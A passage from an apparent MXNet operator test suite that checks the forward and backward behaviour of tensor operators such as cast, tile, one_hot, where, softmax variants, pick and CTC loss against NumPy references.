exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'].asnumpy(), grad_est, rtol=1e-3)
# check addto
exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'].asnumpy(), grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
@with_seed()
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r.asnumpy(), data.asnumpy()[np.arange(n), x.asnumpy()])
@with_seed()
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y.simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
assert exe.outputs[0].dtype == dsttype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0].asnumpy(), X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0].asnumpy(), X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
assert exe.outputs[0].dtype == np.float16
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
check_cast(mx.sym.amp_cast, input_np, expected_output)
@with_seed()
def test_amp_multicast():
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
@with_seed()
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z.bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z.bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
@with_seed()
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats).asnumpy()
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis).asnumpy()
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad.asnumpy(), rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
@with_seed()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad.asnumpy(), rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
@with_seed()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
@with_seed()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx)
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx)
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert(expect_out.all() == out.all())
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
@with_seed()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
@with_seed()
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)])
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1.bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
nparr = ndarr.asnumpy()
assert_almost_equal(nparr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_seed()
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
dtype_softmax_np = dtype_softmax.asnumpy()
ref_softmax_np = ref_softmax.asnumpy()
assert_almost_equal(dtype_softmax_np, ref_softmax_np, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
dtype_grad_np = dtype_input.grad.asnumpy()
ref_grad_np = ref_input.grad.asnumpy()
assert_almost_equal(dtype_grad_np, ref_grad_np, rtol=grad_rtol, atol=grad_atol)
import sys
is_windows = sys.platform.startswith('win')
enforce_safe_acc = os.environ.get("MXNET_SAFE_ACCUMULATION", "0")
if not is_windows or enforce_safe_acc == "1":
os.environ["MXNET_SAFE_ACCUMULATION"] = "1"
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
@with_seed()
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)], rtol=1e-2, atol=1e-3, dtype="asnumpy")
@with_seed()
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0]
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest.asnumpy(), outTrain.asnumpy())
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest.asnumpy(), loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
# check contrib operator for backward compatibility
def check_contrib_ctc_loss(acts, labels, loss_truth):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0]
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest.asnumpy(), outTrain.asnumpy())
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest.asnumpy(), loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
